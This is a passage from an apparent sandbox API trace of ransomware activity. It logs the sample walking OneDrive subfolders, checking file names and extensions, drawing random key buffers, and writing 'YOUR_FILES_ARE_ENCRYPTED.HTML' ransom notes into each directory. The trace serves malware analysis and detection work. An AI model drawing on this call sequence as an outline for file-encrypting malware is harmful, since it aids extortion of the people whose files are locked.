dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.933] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.936] CloseHandle (hObject=0x5b8) returned 1 [0161.936] GetProcessHeap () returned 0x270000 [0161.937] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.937] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa44380b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa44380b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa44380b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x827d0, dwReserved0=0x0, dwReserved1=0x60, cFileName="msvcp110.dll", cAlternateFileName="")) returned 1 [0161.937] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\msvcp110.dll") returned 84 [0161.937] lstrcmpW (lpString1="msvcp110.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.937] PathFindExtensionW (pszPath="msvcp110.dll") returned=".dll" [0161.938] lstrlenW (lpString=".dll") returned 4 [0161.938] PathFindExtensionW (pszPath="msvcp110.dll") returned=".dll" [0161.938] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0161.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\msvcp110.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\msvcp110.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0161.938] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa451c8f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa451c8f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa451c8f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xd29c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="msvcr110.dll", cAlternateFileName="")) returned 1 [0161.938] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\msvcr110.dll") returned 84 [0161.938] lstrcmpW (lpString1="msvcr110.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.938] PathFindExtensionW (pszPath="msvcr110.dll") returned=".dll" [0161.938] lstrlenW (lpString=".dll") returned 4 [0161.938] PathFindExtensionW (pszPath="msvcr110.dll") returned=".dll" [0161.938] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0161.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\msvcr110.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\msvcr110.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0161.938] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6a4e0b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c3d290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c3d290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="mt-mt", cAlternateFileName="")) returned 1 [0161.939] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt") returned 77 [0161.939] GetProcessHeap () returned 0x270000 [0161.939] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.939] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt" [0161.939] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt\\*" [0161.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6a4e0b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c3d290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c3d290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.939] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6a4e0b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c3d290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6c3d290, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.939] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6c3d290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c3d290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6caf6b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.939] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.939] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.939] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.939] lstrlenW (lpString=".mui") returned 4 [0161.939] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.939] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6c3d290, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6c3d290, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6caf6b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.940] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.940] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mt-mt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\mt-mt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.941] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.943] CloseHandle (hObject=0x5b8) returned 1 [0161.944] GetProcessHeap () returned 0x270000 [0161.945] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.945] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6caf6b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e9e890, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e9e890, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="nb-no", cAlternateFileName="")) returned 1 [0161.945] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no") returned 77 [0161.945] GetProcessHeap () returned 0x270000 [0161.945] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.945] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no" [0161.945] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no\\*" [0161.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6caf6b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e9e890, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e9e890, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.946] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6caf6b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e9e890, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e9e890, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.946] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6e9e890, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e9e890, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e9e890, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.946] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.946] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.946] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.946] lstrlenW (lpString=".mui") returned 4 [0161.946] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.946] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6e9e890, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6e9e890, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6e9e890, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x120a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.946] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.946] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nb-no\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\nb-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.947] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.949] CloseHandle (hObject=0x5b8) returned 1 [0161.968] GetProcessHeap () returned 0x270000 [0161.970] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.970] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6e9e890, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa741fb70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa741fb70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ne-np", cAlternateFileName="")) returned 1 [0161.970] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np") returned 77 [0161.970] GetProcessHeap () returned 0x270000 [0161.970] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.970] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np" [0161.970] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np\\*" [0161.970] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6e9e890, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa741fb70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa741fb70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.971] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6e9e890, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa741fb70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa741fb70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.971] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa741fb70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa741fb70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa741fb70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.971] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.971] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.971] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.971] lstrlenW (lpString=".mui") returned 4 [0161.971] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.971] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa741fb70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa741fb70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa741fb70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.971] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.971] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ne-np\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ne-np\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.972] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.975] CloseHandle (hObject=0x5b8) returned 1 [0161.976] GetProcessHeap () returned 0x270000 [0161.978] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.978] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa741fb70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7681170, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7681170, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="nl", cAlternateFileName="")) returned 1 [0161.978] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl") returned 74 [0161.978] GetProcessHeap () returned 0x270000 [0161.978] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.978] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl" [0161.978] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl\\*" [0161.978] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa741fb70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7681170, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7681170, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.979] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa741fb70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7681170, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7681170, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.979] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7681170, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7681170, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7681170, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.979] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\nl\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.979] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.979] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.979] lstrlenW 